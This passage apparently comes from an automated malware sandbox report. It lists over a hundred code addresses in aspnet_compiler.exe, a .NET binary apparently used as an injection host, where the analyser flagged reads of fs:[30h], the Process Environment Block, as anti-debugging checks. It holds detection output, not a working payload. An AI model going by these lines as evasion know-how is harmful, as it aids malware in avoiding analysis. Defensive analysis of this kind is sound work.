                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1273C mov ecx, dword ptr fs:[00000030h]12_2_01A1273C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1273C mov eax, dword ptr fs:[00000030h]12_2_01A1273C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1C700 mov eax, dword ptr fs:[00000030h]12_2_01A1C700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A10710 mov eax, dword ptr fs:[00000030h]12_2_01A10710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E0750 mov eax, dword ptr fs:[00000030h]12_2_019E0750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1674D mov esi, dword ptr fs:[00000030h]12_2_01A1674D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1674D mov eax, dword ptr fs:[00000030h]12_2_01A1674D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1674D mov eax, dword ptr fs:[00000030h]12_2_01A1674D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E8770 mov eax, dword ptr fs:[00000030h]12_2_019E8770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0770 mov eax, dword ptr fs:[00000030h]12_2_019F0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0770 mov eax, dword ptr fs:[00000030h]12_2_019F0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0770 mov eax, dword ptr fs:[00000030h]12_2_019F0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0770 mov eax, dword ptr fs:[00000030h]12_2_019F0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0770 mov eax, dword ptr fs:[00000030h]12_2_019F0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0770 mov eax, dword ptr fs:[00000030h]12_2_019F0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0770 mov eax, dword ptr fs:[00000030h]12_2_019F0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0770 mov eax, dword ptr fs:[00000030h]12_2_019F0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0770 mov eax, dword ptr fs:[00000030h]12_2_019F0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0770 mov eax, dword ptr fs:[00000030h]12_2_019F0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0770 mov eax, dword ptr fs:[00000030h]12_2_019F0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0770 mov eax, dword ptr fs:[00000030h]12_2_019F0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22750 mov eax, dword ptr fs:[00000030h]12_2_01A22750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22750 mov eax, dword ptr fs:[00000030h]12_2_01A22750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A64755 mov eax, dword ptr fs:[00000030h]12_2_01A64755
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6E75D mov eax, dword ptr fs:[00000030h]12_2_01A6E75D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1C6A6 mov eax, dword ptr fs:[00000030h]12_2_01A1C6A6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E4690 mov eax, dword ptr fs:[00000030h]12_2_019E4690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E4690 mov eax, dword ptr fs:[00000030h]12_2_019E4690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A166B0 mov eax, dword ptr fs:[00000030h]12_2_01A166B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5E6F2 mov eax, dword ptr fs:[00000030h]12_2_01A5E6F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5E6F2 mov eax, dword ptr fs:[00000030h]12_2_01A5E6F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5E6F2 mov eax, dword ptr fs:[00000030h]12_2_01A5E6F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5E6F2 mov eax, dword ptr fs:[00000030h]12_2_01A5E6F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A606F1 mov eax, dword ptr fs:[00000030h]12_2_01A606F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A606F1 mov eax, dword ptr fs:[00000030h]12_2_01A606F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1A6C7 mov ebx, dword ptr fs:[00000030h]12_2_01A1A6C7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1A6C7 mov eax, dword ptr fs:[00000030h]12_2_01A1A6C7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A16620 mov eax, dword ptr fs:[00000030h]12_2_01A16620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A18620 mov eax, dword ptr fs:[00000030h]12_2_01A18620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F260B mov eax, dword ptr fs:[00000030h]12_2_019F260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F260B mov eax, dword ptr fs:[00000030h]12_2_019F260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F260B mov eax, dword ptr fs:[00000030h]12_2_019F260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F260B mov eax, dword ptr fs:[00000030h]12_2_019F260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F260B mov eax, dword ptr fs:[00000030h]12_2_019F260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F260B mov eax, dword ptr fs:[00000030h]12_2_019F260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F260B mov eax, dword ptr fs:[00000030h]12_2_019F260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5E609 mov eax, dword ptr fs:[00000030h]12_2_01A5E609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E262C mov eax, dword ptr fs:[00000030h]12_2_019E262C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FE627 mov eax, dword ptr fs:[00000030h]12_2_019FE627
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22619 mov eax, dword ptr fs:[00000030h]12_2_01A22619
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1A660 mov eax, dword ptr fs:[00000030h]12_2_01A1A660
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1A660 mov eax, dword ptr fs:[00000030h]12_2_01A1A660
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA866E mov eax, dword ptr fs:[00000030h]12_2_01AA866E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA866E mov eax, dword ptr fs:[00000030h]12_2_01AA866E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A12674 mov eax, dword ptr fs:[00000030h]12_2_01A12674
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FC640 mov eax, dword ptr fs:[00000030h]12_2_019FC640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A689B3 mov esi, dword ptr fs:[00000030h]12_2_01A689B3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A689B3 mov eax, dword ptr fs:[00000030h]12_2_01A689B3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A689B3 mov eax, dword ptr fs:[00000030h]12_2_01A689B3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E09AD mov eax, dword ptr fs:[00000030h]12_2_019E09AD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E09AD mov eax, dword ptr fs:[00000030h]12_2_019E09AD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F29A0 mov eax, dword ptr fs:[00000030h]12_2_019F29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F29A0 mov eax, dword ptr fs:[00000030h]12_2_019F29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F29A0 mov eax, dword ptr fs:[00000030h]12_2_019F29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F29A0 mov eax, dword ptr fs:[00000030h]12_2_019F29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F29A0 mov eax, dword ptr fs:[00000030h]12_2_019F29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F29A0 mov eax, dword ptr fs:[00000030h]12_2_019F29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F29A0 mov eax, dword ptr fs:[00000030h]12_2_019F29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F29A0 mov eax, dword ptr fs:[00000030h]12_2_019F29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F29A0 mov eax, dword ptr fs:[00000030h]12_2_019F29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F29A0 mov eax, dword ptr fs:[00000030h]12_2_019F29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F29A0 mov eax, dword ptr fs:[00000030h]12_2_019F29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F29A0 mov eax, dword ptr fs:[00000030h]12_2_019F29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F29A0 mov eax, dword ptr fs:[00000030h]12_2_019F29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6E9E0 mov eax, dword ptr fs:[00000030h]12_2_01A6E9E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA9D0 mov eax, dword ptr fs:[00000030h]12_2_019EA9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA9D0 mov eax, dword ptr fs:[00000030h]12_2_019EA9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA9D0 mov eax, dword ptr fs:[00000030h]12_2_019EA9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA9D0 mov eax, dword ptr fs:[00000030h]12_2_019EA9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA9D0 mov eax, dword ptr fs:[00000030h]12_2_019EA9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA9D0 mov eax, dword ptr fs:[00000030h]12_2_019EA9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A129F9 mov eax, dword ptr fs:[00000030h]12_2_01A129F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A129F9 mov eax, dword ptr fs:[00000030h]12_2_01A129F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A769C0 mov eax, dword ptr fs:[00000030h]12_2_01A769C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A149D0 mov eax, dword ptr fs:[00000030h]12_2_01A149D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AAA9D3 mov eax, dword ptr fs:[00000030h]12_2_01AAA9D3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019D8918 mov eax, dword ptr fs:[00000030h]12_2_019D8918
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019D8918 mov eax, dword ptr fs:[00000030h]12_2_019D8918
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6892A mov eax, dword ptr fs:[00000030h]12_2_01A6892A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A7892B mov eax, dword ptr fs:[00000030h]12_2_01A7892B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5E908 mov eax, dword ptr fs:[00000030h]12_2_01A5E908
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5E908 mov eax, dword ptr fs:[00000030h]12_2_01A5E908
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6C912 mov eax, dword ptr fs:[00000030h]12_2_01A6C912
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A06962 mov eax, dword ptr fs:[00000030h]12_2_01A06962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A06962 mov eax, dword ptr fs:[00000030h]12_2_01A06962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A06962 mov eax, dword ptr fs:[00000030h]12_2_01A06962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A2096E mov eax, dword ptr fs:[00000030h]12_2_01A2096E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A2096E mov edx, dword ptr fs:[00000030h]12_2_01A2096E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A2096E mov eax, dword ptr fs:[00000030h]12_2_01A2096E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A84978 mov eax, dword ptr fs:[00000030h]12_2_01A84978
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A84978 mov eax, dword ptr fs:[00000030h]12_2_01A84978
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6C97C mov eax, dword ptr fs:[00000030h]12_2_01A6C97C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A60946 mov eax, dword ptr fs:[00000030h]12_2_01A60946
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E0887 mov eax, dword ptr fs:[00000030h]12_2_019E0887
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6C89D mov eax, dword ptr fs:[00000030h]12_2_01A6C89D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AAA8E4 mov eax, dword ptr fs:[00000030h]12_2_01AAA8E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1C8F9 mov eax, dword ptr fs:[00000030h]12_2_01A1C8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1C8F9 mov eax, dword ptr fs:[00000030h]12_2_01A1C8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0E8C0 mov eax, dword ptr fs:[00000030h]12_2_01A0E8C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1A830 mov eax, dword ptr fs:[00000030h]12_2_01A1A830
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8483A mov eax, dword ptr fs:[00000030h]12_2_01A8483A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8483A mov eax, dword ptr fs:[00000030h]12_2_01A8483A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A02835 mov eax, dword ptr fs:[00000030h]12_2_01A02835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A02835 mov eax, dword ptr fs:[00000030h]12_2_01A02835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A02835 mov eax, dword ptr fs:[00000030h]12_2_01A02835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A02835 mov ecx, dword ptr fs:[00000030h]12_2_01A02835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A02835 mov eax, dword ptr fs:[00000030h]12_2_01A02835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A02835 mov eax, dword ptr fs:[00000030h]12_2_01A02835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6C810 mov eax, dword ptr fs:[00000030h]12_2_01A6C810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E4859 mov eax, dword ptr fs:[00000030h]12_2_019E4859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E4859 mov eax, dword ptr fs:[00000030h]12_2_019E4859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6E872 mov eax, dword ptr fs:[00000030h]12_2_01A6E872
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6E872 mov eax, dword ptr fs:[00000030h]12_2_01A6E872
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A76870 mov eax, dword ptr fs:[00000030h]12_2_01A76870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A76870 mov eax, dword ptr fs:[00000030h]12_2_01A76870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F2840 mov ecx, dword ptr fs:[00000030h]12_2_019F2840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A10854 mov eax, dword ptr fs:[00000030h]12_2_01A10854
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0BBE mov eax, dword ptr fs:[00000030h]12_2_019F0BBE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0BBE mov eax, dword ptr fs:[00000030h]12_2_019F0BBE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E0BCD mov eax, dword ptr fs:[00000030h]12_2_019E0BCD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E0BCD mov eax, dword ptr fs:[00000030h]12_2_019E0BCD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E0BCD mov eax, dword ptr fs:[00000030h]12_2_019E0BCD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6CBF0 mov eax, dword ptr fs:[00000030h]12_2_01A6CBF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0EBFC mov eax, dword ptr fs:[00000030h]12_2_01A0EBFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A00BCB mov eax, dword ptr fs:[00000030h]12_2_01A00BCB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A00BCB mov eax, dword ptr fs:[00000030h]12_2_01A00BCB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A00BCB mov eax, dword ptr fs:[00000030h]12_2_01A00BCB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E8BF0 mov eax, dword ptr fs:[00000030h]12_2_019E8BF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E8BF0 mov eax, dword ptr fs:[00000030h]12_2_019E8BF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E8BF0 mov eax, dword ptr fs:[00000030h]12_2_019E8BF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8EBD0 mov eax, dword ptr fs:[00000030h]12_2_01A8EBD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0EB20 mov eax, dword ptr fs:[00000030h]12_2_01A0EB20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0EB20 mov eax, dword ptr fs:[00000030h]12_2_01A0EB20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA8B28 mov eax, dword ptr fs:[00000030h]12_2_01AA8B28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA8B28 mov eax, dword ptr fs:[00000030h]12_2_01AA8B28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DCB7E mov eax, dword ptr fs:[00000030h]12_2_019DCB7E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A76B40 mov eax, dword ptr fs:[00000030h]12_2_01A76B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A76B40 mov eax, dword ptr fs:[00000030h]12_2_01A76B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AAAB40 mov eax, dword ptr fs:[00000030h]12_2_01AAAB40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A88B42 mov eax, dword ptr fs:[00000030h]12_2_01A88B42
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8EB50 mov eax, dword ptr fs:[00000030h]12_2_01A8EB50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A36AA4 mov eax, dword ptr fs:[00000030h]12_2_01A36AA4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
